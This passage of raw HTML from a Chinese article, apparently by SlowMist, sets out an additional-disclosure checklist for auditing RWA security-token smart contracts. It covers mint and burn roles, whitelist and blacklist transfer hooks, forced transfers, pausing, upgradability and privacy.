normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">未初始化存储指针审计(Uninitialized Storage Pointer Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr></tbody></table><h3 dir="ltr" style="margin-top: 0px;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">III. 智能合约附加信息披露表格</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为了满足监管机构对于业务连续性的要求，慢雾安全团队专门依据之前多家 STO 审计及相应的监管要求，编制了下述附加信息披露表格。</span></span></p><table><tbody><tr><td colspan="2"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">其他信息(Additional Information)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">披露项目(Item)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">技术实现与合规解释(Explain &amp; Technical Implementation)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码开源与验证(Source code verified)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">智能合约代码是否已在主网（或其他目标DLT网络）部署，并是否完成源代码验证。部署的字节码与本次审计的源代码是否完全一致。审计报告中包含了最终部署代码的加密哈希值。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约漏洞与修复(Contract Bugs)(e.g. miscalculation, nonce error, non-zero address verification...)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依据 SlowMist 审计发现.所有高危及严重漏洞是否已修复并复核通过。审计中发现的关于权限过大及多签阈值的建议，开发团队是否已在部署前通过引入时间锁(Timelock) 和多签钱包进行了针对性加固。 </span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代理模式与可升级性(Proxy &amp; Upgradability)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约是否采用代理模式。系统是否由“逻辑合约”和“数据合约”两部分组成。这允许项目方在不改变代币合约地址的前提下，通过升级逻辑合约来修复漏洞或适应新的监管规则。升级操作仅能由 Admin 角色（多签管理）执行。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">铸造机制(Mint requirements)</span></span></p></td><td><div><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">铸造功能是否严格对应链下资产储备。仅有 Minter 角色可以通过调用 mint 或 issueByPartition 函数发行代币。Minter 角色的操作权限受 MinterController 管控，且设有铸造上限（如有）。每一次铸造都会触发 Issued 事件，便于链下审计。</span></span></p></div></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">销毁机制(Burn requirements)</span></span></p></td><td><div><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">销毁功能是否用于处理资产赎回。用户无法自行销毁代币（防止误操作），通常由 Controller 或 Minter 角色在确认链下资产已返还给用户后，调用 redeem 或 burn 函数进行链上销毁。此操作将永久减少 totalSupply。</span></span></p></div></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">转账限制与合规拦截(Transfer Limitations)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代币合约是否实现了转账限制功能。每一次 transfer 都会触发钩子函数，验证：1. 交易双方是否在白名单内（KYC/AML 通过）；2. 是否未被列入黑名单。这确保了代币不会流向未经认证的零售用户或受制裁实体。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">转账费用(Transfer fees)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">除区块链网络原生的 Gas 费用外，智能合约参数中未设置任何额外的交易手续费，确保了价值流转的低摩擦性。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">项目方修改合约权限(Owner privileges)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">记录权限角色可以对合约产生的影响。如 Minter 可以通过发行增加总供应量，Controller 可以通过强制赎回减少总供应量。虽然这些操作会影响代币总量，但这被确认符合 RWA 业务逻辑（申购与赎回），且受到严格的权限管控。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">余额修改与强制操作(Changing balances)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">一般情况下，项目方无法随意修改用户余额。但在满足监管触发条件（如反洗钱调查、法院冻结令）时，BlacklistController 或 RecoveryAdmin 可以调用 wipeBlacklistedUser 或 forcedTransfer 函数，强制扣除或转移特定地址的资产。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">隐形管理员风险(Hidden owners)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">经审计确认，合约中是否存在“隐形管理员”或未公开的后门地址。所有特权角色是否已在 AccessControl 模块中显式定义。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">自毁功能(Self destruct)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">经审计确认，合约中不存在 selfdestruct 逻辑。这意味着代币合约不会被恶意销毁，保障了资产的持久性。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">外部调用风险(External call risk)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约中是否存在对外部逻辑的调用（如合规钩子 _callTokenExtension）。审计确认这些调用均指向可信的合约地址，且具备清晰的接口定义。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">黑白名单定义(Whitelist/Blacklist)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">白名单：用于限制代币仅能在通过 KYC 的合规用户间流转（视具体监管要求而定）。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">黑名单：用于反洗钱(AML) 和制裁执行。被列入黑名单的地址将无法进行任何代币操作（发送、接收、销毁、授权）。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">跨链机制(Cross-chain mechanism)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">目前 RWA 代币是否在单一主网发行。若涉及跨链，将采用“锁定-铸造”或“销毁-铸造”的桥接机制，且必须确保身份注册表在目标链上的同步。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">暂停/熔断机制(Pause Functionality)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约是否实现了全面的暂停机制。Pauser 角色可以在紧急情况下调用  pause，此时 whenNotpaused 修饰器将阻止所有资产转移。这为处理监管合规问题或系统维护提供了必要的“时间窗口”。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">没收/资金扣押功能(Wipe/Seize)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">针对严重违规，合约是否有赋予 BlacklistController 没收资产的能力。wipeBlacklistedUser 函数允许管理员将黑名单用户的资产销毁(Burn)，从而在链上实现资产的扣押。该操作需配合链下的法律程序执行。</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">隐私风险(Privacy risks)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">智能合约是否存储用户的任何隐私数据(PII)。链上仅存储钱包地址及其对应的身份哈希或状态标记。</span></span></p></td></tr></tbody></table><h2 dir="ltr" style="margin-top: 0px;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">结语：构建代码与现实世界的安全桥梁</span></span></h2><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在审计实践中，审计人员不仅需要验证代码是否忠实执行了 EIP 标准，更要假设自己是试图绕过 KYC 白名单、操纵预言机喂价、或利用管理员权限漏洞的攻击者。只有通过深度的业务逻辑建模和全生命周期的风险排查，才能发现隐藏在合规流程下的技术陷阱。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: 